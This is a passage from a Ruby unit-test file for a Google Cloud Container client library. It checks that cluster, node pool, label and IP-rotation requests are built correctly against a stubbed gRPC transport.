    assert_kind_of ::Google::Cloud::Container::V1::SetMasterAuthRequest, request
    assert_equal "hello world", request["project_id"]
    assert_equal "hello world", request["zone"]
    assert_equal "hello world", request["cluster_id"]
    assert_equal :UNKNOWN, request["action"]
    assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Container::V1::MasterAuth), request["update"]
    assert_equal "hello world", request["name"]
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, client_stub do
    client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Shared response/operation check used by every calling convention.
    verify = lambda do |response, operation|
      assert_equal expected_response, response
      assert_equal expected_operation, operation
    end

    request_fields = { project_id: project_id, zone: zone, cluster_id: cluster_id, action: action, update: update, name: name }

    # Exercise all five supported calling conventions.
    client.set_master_auth request_fields, &verify
    client.set_master_auth(**request_fields, &verify)
    client.set_master_auth ::Google::Cloud::Container::V1::SetMasterAuthRequest.new(**request_fields), &verify
    client.set_master_auth request_fields, grpc_options, &verify
    client.set_master_auth ::Google::Cloud::Container::V1::SetMasterAuthRequest.new(**request_fields), grpc_options, &verify

    # Each convention must have reached the transport exactly once.
    assert_equal 5, client_stub.call_rpc_count
  end
end
def test_delete_cluster
  # Doubles returned by the stubbed transport layer.
  expected_response = ::Google::Cloud::Container::V1::Operation.new
  expected_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Request field values shared by every invocation style below.
  project_id = "hello world"
  zone = "hello world"
  cluster_id = "hello world"
  name = "hello world"

  # The stub verifies the RPC name and every request field on each call.
  client_stub = ClientStub.new expected_response, expected_operation do |rpc_name, request, options:|
    assert_equal :delete_cluster, rpc_name
    assert_kind_of ::Google::Cloud::Container::V1::DeleteClusterRequest, request
    assert_equal "hello world", request["project_id"]
    assert_equal "hello world", request["zone"]
    assert_equal "hello world", request["cluster_id"]
    assert_equal "hello world", request["name"]
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, client_stub do
    client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Shared response/operation check used by every calling convention.
    verify = lambda do |response, operation|
      assert_equal expected_response, response
      assert_equal expected_operation, operation
    end

    request_fields = { project_id: project_id, zone: zone, cluster_id: cluster_id, name: name }

    # Exercise all five supported calling conventions.
    client.delete_cluster request_fields, &verify
    client.delete_cluster(**request_fields, &verify)
    client.delete_cluster ::Google::Cloud::Container::V1::DeleteClusterRequest.new(**request_fields), &verify
    client.delete_cluster request_fields, grpc_options, &verify
    client.delete_cluster ::Google::Cloud::Container::V1::DeleteClusterRequest.new(**request_fields), grpc_options, &verify

    # Each convention must have reached the transport exactly once.
    assert_equal 5, client_stub.call_rpc_count
  end
end
def test_list_operations
  # Doubles returned by the stubbed transport layer.
  expected_response = ::Google::Cloud::Container::V1::ListOperationsResponse.new
  expected_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Request field values shared by every invocation style below.
  project_id = "hello world"
  zone = "hello world"
  parent = "hello world"

  # The stub verifies the RPC name and every request field on each call.
  client_stub = ClientStub.new expected_response, expected_operation do |rpc_name, request, options:|
    assert_equal :list_operations, rpc_name
    assert_kind_of ::Google::Cloud::Container::V1::ListOperationsRequest, request
    assert_equal "hello world", request["project_id"]
    assert_equal "hello world", request["zone"]
    assert_equal "hello world", request["parent"]
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, client_stub do
    client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Shared response/operation check used by every calling convention.
    verify = lambda do |response, operation|
      assert_equal expected_response, response
      assert_equal expected_operation, operation
    end

    request_fields = { project_id: project_id, zone: zone, parent: parent }

    # Exercise all five supported calling conventions.
    client.list_operations request_fields, &verify
    client.list_operations(**request_fields, &verify)
    client.list_operations ::Google::Cloud::Container::V1::ListOperationsRequest.new(**request_fields), &verify
    client.list_operations request_fields, grpc_options, &verify
    client.list_operations ::Google::Cloud::Container::V1::ListOperationsRequest.new(**request_fields), grpc_options, &verify

    # Each convention must have reached the transport exactly once.
    assert_equal 5, client_stub.call_rpc_count
  end
end
def test_get_operation
  # Doubles returned by the stubbed transport layer.
  expected_response = ::Google::Cloud::Container::V1::Operation.new
  expected_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Request field values shared by every invocation style below.
  project_id = "hello world"
  zone = "hello world"
  operation_id = "hello world"
  name = "hello world"

  # The stub verifies the RPC name and every request field on each call.
  client_stub = ClientStub.new expected_response, expected_operation do |rpc_name, request, options:|
    assert_equal :get_operation, rpc_name
    assert_kind_of ::Google::Cloud::Container::V1::GetOperationRequest, request
    assert_equal "hello world", request["project_id"]
    assert_equal "hello world", request["zone"]
    assert_equal "hello world", request["operation_id"]
    assert_equal "hello world", request["name"]
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, client_stub do
    client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Shared response/operation check used by every calling convention.
    verify = lambda do |response, operation|
      assert_equal expected_response, response
      assert_equal expected_operation, operation
    end

    request_fields = { project_id: project_id, zone: zone, operation_id: operation_id, name: name }

    # Exercise all five supported calling conventions.
    client.get_operation request_fields, &verify
    client.get_operation(**request_fields, &verify)
    client.get_operation ::Google::Cloud::Container::V1::GetOperationRequest.new(**request_fields), &verify
    client.get_operation request_fields, grpc_options, &verify
    client.get_operation ::Google::Cloud::Container::V1::GetOperationRequest.new(**request_fields), grpc_options, &verify

    # Each convention must have reached the transport exactly once.
    assert_equal 5, client_stub.call_rpc_count
  end
end
def test_cancel_operation
  # Doubles returned by the stubbed transport layer.
  expected_response = ::Google::Protobuf::Empty.new
  expected_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Request field values shared by every invocation style below.
  project_id = "hello world"
  zone = "hello world"
  operation_id = "hello world"
  name = "hello world"

  # The stub verifies the RPC name and every request field on each call.
  client_stub = ClientStub.new expected_response, expected_operation do |rpc_name, request, options:|
    assert_equal :cancel_operation, rpc_name
    assert_kind_of ::Google::Cloud::Container::V1::CancelOperationRequest, request
    assert_equal "hello world", request["project_id"]
    assert_equal "hello world", request["zone"]
    assert_equal "hello world", request["operation_id"]
    assert_equal "hello world", request["name"]
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, client_stub do
    client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Shared response/operation check used by every calling convention.
    verify = lambda do |response, operation|
      assert_equal expected_response, response
      assert_equal expected_operation, operation
    end

    request_fields = { project_id: project_id, zone: zone, operation_id: operation_id, name: name }

    # Exercise all five supported calling conventions.
    client.cancel_operation request_fields, &verify
    client.cancel_operation(**request_fields, &verify)
    client.cancel_operation ::Google::Cloud::Container::V1::CancelOperationRequest.new(**request_fields), &verify
    client.cancel_operation request_fields, grpc_options, &verify
    client.cancel_operation ::Google::Cloud::Container::V1::CancelOperationRequest.new(**request_fields), grpc_options, &verify

    # Each convention must have reached the transport exactly once.
    assert_equal 5, client_stub.call_rpc_count
  end
end
def test_get_server_config
  # Doubles returned by the stubbed transport layer.
  expected_response = ::Google::Cloud::Container::V1::ServerConfig.new
  expected_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Request field values shared by every invocation style below.
  project_id = "hello world"
  zone = "hello world"
  name = "hello world"

  # The stub verifies the RPC name and every request field on each call.
  client_stub = ClientStub.new expected_response, expected_operation do |rpc_name, request, options:|
    assert_equal :get_server_config, rpc_name
    assert_kind_of ::Google::Cloud::Container::V1::GetServerConfigRequest, request
    assert_equal "hello world", request["project_id"]
    assert_equal "hello world", request["zone"]
    assert_equal "hello world", request["name"]
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, client_stub do
    client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Shared response/operation check used by every calling convention.
    verify = lambda do |response, operation|
      assert_equal expected_response, response
      assert_equal expected_operation, operation
    end

    request_fields = { project_id: project_id, zone: zone, name: name }

    # Exercise all five supported calling conventions.
    client.get_server_config request_fields, &verify
    client.get_server_config(**request_fields, &verify)
    client.get_server_config ::Google::Cloud::Container::V1::GetServerConfigRequest.new(**request_fields), &verify
    client.get_server_config request_fields, grpc_options, &verify
    client.get_server_config ::Google::Cloud::Container::V1::GetServerConfigRequest.new(**request_fields), grpc_options, &verify

    # Each convention must have reached the transport exactly once.
    assert_equal 5, client_stub.call_rpc_count
  end
end
def test_get_json_web_keys
  # Doubles returned by the stubbed transport layer.
  expected_response = ::Google::Cloud::Container::V1::GetJSONWebKeysResponse.new
  expected_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Request field value shared by every invocation style below.
  parent = "hello world"

  # The stub verifies the RPC name and every request field on each call.
  client_stub = ClientStub.new expected_response, expected_operation do |rpc_name, request, options:|
    assert_equal :get_json_web_keys, rpc_name
    assert_kind_of ::Google::Cloud::Container::V1::GetJSONWebKeysRequest, request
    assert_equal "hello world", request["parent"]
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, client_stub do
    client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Shared response/operation check used by every calling convention.
    verify = lambda do |response, operation|
      assert_equal expected_response, response
      assert_equal expected_operation, operation
    end

    request_fields = { parent: parent }

    # Exercise all five supported calling conventions.
    client.get_json_web_keys request_fields, &verify
    client.get_json_web_keys(**request_fields, &verify)
    client.get_json_web_keys ::Google::Cloud::Container::V1::GetJSONWebKeysRequest.new(**request_fields), &verify
    client.get_json_web_keys request_fields, grpc_options, &verify
    client.get_json_web_keys ::Google::Cloud::Container::V1::GetJSONWebKeysRequest.new(**request_fields), grpc_options, &verify

    # Each convention must have reached the transport exactly once.
    assert_equal 5, client_stub.call_rpc_count
  end
end
def test_list_node_pools
  # Doubles returned by the stubbed transport layer.
  expected_response = ::Google::Cloud::Container::V1::ListNodePoolsResponse.new
  expected_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Request field values shared by every invocation style below.
  project_id = "hello world"
  zone = "hello world"
  cluster_id = "hello world"
  parent = "hello world"

  # The stub verifies the RPC name and every request field on each call.
  client_stub = ClientStub.new expected_response, expected_operation do |rpc_name, request, options:|
    assert_equal :list_node_pools, rpc_name
    assert_kind_of ::Google::Cloud::Container::V1::ListNodePoolsRequest, request
    assert_equal "hello world", request["project_id"]
    assert_equal "hello world", request["zone"]
    assert_equal "hello world", request["cluster_id"]
    assert_equal "hello world", request["parent"]
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, client_stub do
    client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Shared response/operation check used by every calling convention.
    verify = lambda do |response, operation|
      assert_equal expected_response, response
      assert_equal expected_operation, operation
    end

    request_fields = { project_id: project_id, zone: zone, cluster_id: cluster_id, parent: parent }

    # Exercise all five supported calling conventions.
    client.list_node_pools request_fields, &verify
    client.list_node_pools(**request_fields, &verify)
    client.list_node_pools ::Google::Cloud::Container::V1::ListNodePoolsRequest.new(**request_fields), &verify
    client.list_node_pools request_fields, grpc_options, &verify
    client.list_node_pools ::Google::Cloud::Container::V1::ListNodePoolsRequest.new(**request_fields), grpc_options, &verify

    # Each convention must have reached the transport exactly once.
    assert_equal 5, client_stub.call_rpc_count
  end
end
def test_get_node_pool
  # Doubles returned by the stubbed transport layer.
  expected_response = ::Google::Cloud::Container::V1::NodePool.new
  expected_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Request field values shared by every invocation style below.
  project_id = "hello world"
  zone = "hello world"
  cluster_id = "hello world"
  node_pool_id = "hello world"
  name = "hello world"

  # The stub verifies the RPC name and every request field on each call.
  client_stub = ClientStub.new expected_response, expected_operation do |rpc_name, request, options:|
    assert_equal :get_node_pool, rpc_name
    assert_kind_of ::Google::Cloud::Container::V1::GetNodePoolRequest, request
    assert_equal "hello world", request["project_id"]
    assert_equal "hello world", request["zone"]
    assert_equal "hello world", request["cluster_id"]
    assert_equal "hello world", request["node_pool_id"]
    assert_equal "hello world", request["name"]
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, client_stub do
    client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Shared response/operation check used by every calling convention.
    verify = lambda do |response, operation|
      assert_equal expected_response, response
      assert_equal expected_operation, operation
    end

    request_fields = { project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, name: name }

    # Exercise all five supported calling conventions.
    client.get_node_pool request_fields, &verify
    client.get_node_pool(**request_fields, &verify)
    client.get_node_pool ::Google::Cloud::Container::V1::GetNodePoolRequest.new(**request_fields), &verify
    client.get_node_pool request_fields, grpc_options, &verify
    client.get_node_pool ::Google::Cloud::Container::V1::GetNodePoolRequest.new(**request_fields), grpc_options, &verify

    # Each convention must have reached the transport exactly once.
    assert_equal 5, client_stub.call_rpc_count
  end
end
def test_create_node_pool
  # Doubles returned by the stubbed transport layer.
  expected_response = ::Google::Cloud::Container::V1::Operation.new
  expected_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Request field values shared by every invocation style below.
  project_id = "hello world"
  zone = "hello world"
  cluster_id = "hello world"
  node_pool = {}
  parent = "hello world"

  # The stub verifies the RPC name and every request field on each call.
  client_stub = ClientStub.new expected_response, expected_operation do |rpc_name, request, options:|
    assert_equal :create_node_pool, rpc_name
    assert_kind_of ::Google::Cloud::Container::V1::CreateNodePoolRequest, request
    assert_equal "hello world", request["project_id"]
    assert_equal "hello world", request["zone"]
    assert_equal "hello world", request["cluster_id"]
    assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Container::V1::NodePool), request["node_pool"]
    assert_equal "hello world", request["parent"]
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, client_stub do
    client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Shared response/operation check used by every calling convention.
    verify = lambda do |response, operation|
      assert_equal expected_response, response
      assert_equal expected_operation, operation
    end

    request_fields = { project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool: node_pool, parent: parent }

    # Exercise all five supported calling conventions.
    client.create_node_pool request_fields, &verify
    client.create_node_pool(**request_fields, &verify)
    client.create_node_pool ::Google::Cloud::Container::V1::CreateNodePoolRequest.new(**request_fields), &verify
    client.create_node_pool request_fields, grpc_options, &verify
    client.create_node_pool ::Google::Cloud::Container::V1::CreateNodePoolRequest.new(**request_fields), grpc_options, &verify

    # Each convention must have reached the transport exactly once.
    assert_equal 5, client_stub.call_rpc_count
  end
end
def test_delete_node_pool
  # Doubles returned by the stubbed transport layer.
  expected_response = ::Google::Cloud::Container::V1::Operation.new
  expected_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Request field values shared by every invocation style below.
  project_id = "hello world"
  zone = "hello world"
  cluster_id = "hello world"
  node_pool_id = "hello world"
  name = "hello world"

  # The stub verifies the RPC name and every request field on each call.
  client_stub = ClientStub.new expected_response, expected_operation do |rpc_name, request, options:|
    assert_equal :delete_node_pool, rpc_name
    assert_kind_of ::Google::Cloud::Container::V1::DeleteNodePoolRequest, request
    assert_equal "hello world", request["project_id"]
    assert_equal "hello world", request["zone"]
    assert_equal "hello world", request["cluster_id"]
    assert_equal "hello world", request["node_pool_id"]
    assert_equal "hello world", request["name"]
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, client_stub do
    client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Shared response/operation check used by every calling convention.
    verify = lambda do |response, operation|
      assert_equal expected_response, response
      assert_equal expected_operation, operation
    end

    request_fields = { project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, name: name }

    # Exercise all five supported calling conventions.
    client.delete_node_pool request_fields, &verify
    client.delete_node_pool(**request_fields, &verify)
    client.delete_node_pool ::Google::Cloud::Container::V1::DeleteNodePoolRequest.new(**request_fields), &verify
    client.delete_node_pool request_fields, grpc_options, &verify
    client.delete_node_pool ::Google::Cloud::Container::V1::DeleteNodePoolRequest.new(**request_fields), grpc_options, &verify

    # Each convention must have reached the transport exactly once.
    assert_equal 5, client_stub.call_rpc_count
  end
end
def test_rollback_node_pool_upgrade
  # Doubles returned by the stubbed transport layer.
  expected_response = ::Google::Cloud::Container::V1::Operation.new
  expected_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Request field values shared by every invocation style below.
  project_id = "hello world"
  zone = "hello world"
  cluster_id = "hello world"
  node_pool_id = "hello world"
  name = "hello world"

  # The stub verifies the RPC name and every request field on each call.
  client_stub = ClientStub.new expected_response, expected_operation do |rpc_name, request, options:|
    assert_equal :rollback_node_pool_upgrade, rpc_name
    assert_kind_of ::Google::Cloud::Container::V1::RollbackNodePoolUpgradeRequest, request
    assert_equal "hello world", request["project_id"]
    assert_equal "hello world", request["zone"]
    assert_equal "hello world", request["cluster_id"]
    assert_equal "hello world", request["node_pool_id"]
    assert_equal "hello world", request["name"]
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, client_stub do
    client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Shared response/operation check used by every calling convention.
    verify = lambda do |response, operation|
      assert_equal expected_response, response
      assert_equal expected_operation, operation
    end

    request_fields = { project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, name: name }

    # Exercise all five supported calling conventions.
    client.rollback_node_pool_upgrade request_fields, &verify
    client.rollback_node_pool_upgrade(**request_fields, &verify)
    client.rollback_node_pool_upgrade ::Google::Cloud::Container::V1::RollbackNodePoolUpgradeRequest.new(**request_fields), &verify
    client.rollback_node_pool_upgrade request_fields, grpc_options, &verify
    client.rollback_node_pool_upgrade ::Google::Cloud::Container::V1::RollbackNodePoolUpgradeRequest.new(**request_fields), grpc_options, &verify

    # Each convention must have reached the transport exactly once.
    assert_equal 5, client_stub.call_rpc_count
  end
end
def test_set_node_pool_management
  # Doubles returned by the stubbed transport layer.
  expected_response = ::Google::Cloud::Container::V1::Operation.new
  expected_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Request field values shared by every invocation style below.
  project_id = "hello world"
  zone = "hello world"
  cluster_id = "hello world"
  node_pool_id = "hello world"
  management = {}
  name = "hello world"

  # The stub verifies the RPC name and every request field on each call.
  client_stub = ClientStub.new expected_response, expected_operation do |rpc_name, request, options:|
    assert_equal :set_node_pool_management, rpc_name
    assert_kind_of ::Google::Cloud::Container::V1::SetNodePoolManagementRequest, request
    assert_equal "hello world", request["project_id"]
    assert_equal "hello world", request["zone"]
    assert_equal "hello world", request["cluster_id"]
    assert_equal "hello world", request["node_pool_id"]
    assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Container::V1::NodeManagement), request["management"]
    assert_equal "hello world", request["name"]
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, client_stub do
    client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Shared response/operation check used by every calling convention.
    verify = lambda do |response, operation|
      assert_equal expected_response, response
      assert_equal expected_operation, operation
    end

    request_fields = { project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, management: management, name: name }

    # Exercise all five supported calling conventions.
    client.set_node_pool_management request_fields, &verify
    client.set_node_pool_management(**request_fields, &verify)
    client.set_node_pool_management ::Google::Cloud::Container::V1::SetNodePoolManagementRequest.new(**request_fields), &verify
    client.set_node_pool_management request_fields, grpc_options, &verify
    client.set_node_pool_management ::Google::Cloud::Container::V1::SetNodePoolManagementRequest.new(**request_fields), grpc_options, &verify

    # Each convention must have reached the transport exactly once.
    assert_equal 5, client_stub.call_rpc_count
  end
end
def test_set_labels
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
resource_labels = {}
label_fingerprint = "hello world"
name = "hello world"
set_labels_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :set_labels, name
assert_kind_of ::Google::Cloud::Container::V1::SetLabelsRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal({}, request["resource_labels"].to_h)
assert_equal "hello world", request["label_fingerprint"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, set_labels_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.set_labels({ project_id: project_id, zone: zone, cluster_id: cluster_id, resource_labels: resource_labels, label_fingerprint: label_fingerprint, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.set_labels project_id: project_id, zone: zone, cluster_id: cluster_id, resource_labels: resource_labels, label_fingerprint: label_fingerprint, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.set_labels ::Google::Cloud::Container::V1::SetLabelsRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, resource_labels: resource_labels, label_fingerprint: label_fingerprint, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.set_labels({ project_id: project_id, zone: zone, cluster_id: cluster_id, resource_labels: resource_labels, label_fingerprint: label_fingerprint, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.set_labels ::Google::Cloud::Container::V1::SetLabelsRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, resource_labels: resource_labels, label_fingerprint: label_fingerprint, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, set_labels_client_stub.call_rpc_count
end
end
def test_set_legacy_abac
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
enabled = true
name = "hello world"
set_legacy_abac_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :set_legacy_abac, name
assert_kind_of ::Google::Cloud::Container::V1::SetLegacyAbacRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal true, request["enabled"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, set_legacy_abac_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.set_legacy_abac({ project_id: project_id, zone: zone, cluster_id: cluster_id, enabled: enabled, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.set_legacy_abac project_id: project_id, zone: zone, cluster_id: cluster_id, enabled: enabled, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.set_legacy_abac ::Google::Cloud::Container::V1::SetLegacyAbacRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, enabled: enabled, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.set_legacy_abac({ project_id: project_id, zone: zone, cluster_id: cluster_id, enabled: enabled, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.set_legacy_abac ::Google::Cloud::Container::V1::SetLegacyAbacRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, enabled: enabled, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, set_legacy_abac_client_stub.call_rpc_count
end
end
def test_start_ip_rotation
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
name = "hello world"
rotate_credentials = true
start_ip_rotation_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :start_ip_rotation, name
assert_kind_of ::Google::Cloud::Container::V1::StartIPRotationRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal "hello world", request["name"]
assert_equal true, request["rotate_credentials"]
refute_nil options
end
Gapic::ServiceStub.stub :new, start_ip_rotation_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.start_ip_rotation({ project_id: project_id, zone: zone, cluster_id: cluster_id, name: name, rotate_credentials: rotate_credentials }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.start_ip_rotation project_id: project_id, zone: zone, cluster_id: cluster_id, name: name, rotate_credentials: rotate_credentials do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.start_ip_rotation ::Google::Cloud::Container::V1::StartIPRotationRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, name: name, rotate_credentials: rotate_credentials) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.start_ip_rotation({ project_id: project_id, zone: zone, cluster_id: cluster_id, name: name, rotate_credentials: rotate_credentials }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.start_ip_rotation ::Google::Cloud::Container::V1::StartIPRotationRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, name: name, rotate_credentials: rotate_credentials), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, start_ip_rotation_client_stub.call_rpc_count
end
end
def test_complete_ip_rotation
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
name = "hello world"
complete_ip_rotation_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :complete_ip_rotation, name
assert_kind_of ::Google::Cloud::Container::V1::CompleteIPRotationRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, complete_ip_rotation_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.complete_ip_rotation({ project_id: project_id, zone: zone, cluster_id: cluster_id, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.complete_ip_rotation project_id: project_id, zone: zone, cluster_id: cluster_id, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.complete_ip_rotation ::Google::Cloud::Container::V1::CompleteIPRotationRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.complete_ip_rotation({ project_id: project_id, zone: zone, cluster_id: cluster_id, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.complete_ip_rotation ::Google::Cloud::Container::V1::CompleteIPRotationRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, complete_ip_rotation_client_stub.call_rpc_count
end
end
def test_set_node_pool_size
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
